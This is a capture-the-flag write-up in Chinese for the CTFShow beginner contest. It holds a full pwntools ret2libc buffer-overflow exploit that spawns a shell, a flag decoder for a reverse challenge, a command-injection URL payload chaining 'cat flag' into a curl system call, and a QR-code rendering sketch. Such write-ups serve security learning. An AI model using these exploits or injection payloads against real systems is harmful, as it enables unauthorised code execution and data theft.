CTFShow萌新赛-WriteUp
记一次签到签退游…..
PWN
Pwn签到
checksec看到只开启了nx保护
程序有puts函数可以拿来泄露libc的基地址,然后只要利用ROPgadget找到程序中的pop rdi;ret代码段保持堆栈平衡使程序返回到主函数以继续运行,从而执行libc中的system函数即可。
EXP:
#coding:utf-8
from pwn import *
sh = process("./pwn")
#sh = remote("124.156.121.112",28087)
elf = ELF("./pwn")
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
#libc = ELF("./libc6_2.19-10ubuntu2_i386.so")
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
rdi_ret = 0x0000000000400793 # pop_rdi_ret #ROPgadgets --binary ./pwn --only "pop|ret"
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.sym['main']
print "puts_got:"+ hex(puts_got)
print "main_Addr:"+ hex(main_addr)
sh.recvuntil("successful!\n")
#gdb.attach(sh)
payload = "a"*120 #溢出点,可以拿cyclic来测试
payload+= p64(rdi_ret)
payload+= p64(puts_got)
payload+= p64(puts_plt)
payload += p64(main_addr)
sh.sendline(payload)
sh.recvuntil("joke") #这里要注意,先接收到joke后再接受数据
puts_addr = u64(sh.recv(6)+'\x00\x00') #这里只能接受6位,八位就多了
base_addr = puts_addr-libc.sym['puts']
success("puts_rel:0x%x",puts_addr)
success("base:0x%x",base_addr)
system = base_addr+libc.sym['system']
success("system:0x%x",system)
payload2 = "a"*120
payload2+= p64(rdi_ret)
payload2+= p64(base_addr+libc.search('/bin/sh').next())
payload2+= p64(system)
payload2 += p64(main_addr)
sh.recvuntil("successful!\n")
#gdb.attach(sh)
sh.sendline(payload2)
sh.interactive()
Reverse
签退(by W22)
拿到一个pyc的文件,先放网上在线反编译,得到源代码,然后便分析边写EXP
#coding:utf-8
import string
c_charset = string.ascii_uppercase + string.ascii_lowercase + string.digits + '()'
base64_charset = c_charset
flag = 'BozjB3vlZ3ThBn9bZ2jhOH93ZaH9'
#base64实现
import base64
import string
# base 字符集
base64_charset = string.ascii_uppercase + string.ascii_lowercase + string.digits + '+/'
def encode(origin_bytes):
"""
将bytes类型编码为base64
:param origin_bytes:需要编码的bytes
:return:base64字符串
"""
# 将每一位bytes转换为二进制字符串
base64_bytes = ['{:0>8}'.format(str(bin(b)).replace('0b', '')) for b in origin_bytes]
resp = ''
nums = len(base64_bytes) // 3
remain = len(base64_bytes) % 3
integral_part = base64_bytes[0:3 * nums]
while integral_part:
# 取三个字节,以每6比特,转换为4个整数
tmp_unit = ''.join(integral_part[0:3])
tmp_unit = [int(tmp_unit[x: x + 6], 2) for x in [0, 6, 12, 18]]
# 取对应base64字符
resp += ''.join([base64_charset[i] for i in tmp_unit])
integral_part = integral_part[3:]
if remain:
# 补齐三个字节,每个字节补充 0000 0000
remain_part = ''.join(base64_bytes[3 * nums:]) + (3 - remain) * '0' * 8
# 取三个字节,以每6比特,转换为4个整数
# 剩余1字节可构造2个base64字符,补充==;剩余2字节可构造3个base64字符,补充=
tmp_unit = [int(remain_part[x: x + 6], 2) for x in [0, 6, 12, 18]][:remain + 1]
resp += ''.join([base64_charset[i] for i in tmp_unit]) + (3 - remain) * '='
return resp
def decode(base64_str):
"""
解码base64字符串
:param base64_str:base64字符串
:return:解码后的bytearray;若入参不是合法base64字符串,返回空bytearray
"""
if not valid_base64_str(base64_str):
return bytearray()
# 对每一个base64字符取下标索引,并转换为6为二进制字符串
base64_bytes = ['{:0>6}'.format(str(bin(base64_charset.index(s))).replace('0b', '')) for s in base64_str if s != '=']
resp = bytearray()
nums = len(base64_bytes) // 4
remain = len(base64_bytes) % 4
integral_part = base64_bytes[0:4 * nums]
while integral_part:
# 取4个6位base64字符,作为3个字节
tmp_unit = ''.join(integral_part[0:4])
tmp_unit = [int(tmp_unit[x: x + 8], 2) for x in [0, 8, 16]]
for i in tmp_unit:
resp.append(i)
integral_part = integral_part[4:]
if remain:
remain_part = ''.join(base64_bytes[nums * 4:])
tmp_unit = [int(remain_part[i * 8:(i + 1) * 8], 2) for i in range(remain - 1)]
for i in tmp_unit:
resp.append(i)
return resp
def valid_base64_str(b_str):
"""
验证是否为合法base64字符串
:param b_str: 待验证的base64字符串
:return:是否合法
"""
if len(b_str) % 4:
return False
for m in b_str:
if m not in base64_charset:
return False
return True
def rend(s):
def encodeCh(ch):
f = lambda x: chr((ord(ch) - x - 2) % 26 + x)
if ch.islower():
return f(97)
if ch.isupper():
return f(65)
return ch
# print ('').join(encodeCh(c) for c in s)
return ('').join(encodeCh(c) for c in s)
print decode(rend(flag))
# print decode(flag)
# okay decompiling re3.pyc
WEB
web签到
构造url参数使system("curl https://".$_GET['url'].".ctf.show");变成三个命令即可
?url=b5dda168-0230-4c82-80b5-fff00e1d274d.chall.ctf.show|cat flag||b5dda168-0230-4c82-80b5-fff00e1d274d.chall
MISC
Qrcode
01字符串代换变成QRcode二维码,知其然不知其所以然….
可以利用Java的processing框架来实现编码
size(25, 25); //文本长625,也就是25*25px
String[] str = loadStrings("qrcode.txt");
for (int i=0; i<625; i++) {
if (str[0].charAt(i)=='1') {
point(i/25, i%25);
}
}
prcessing国内下载地址,前提是要配置好java环境 http://dx1.pc0359.cn/soft/P/processing.rar
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020-03-06,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
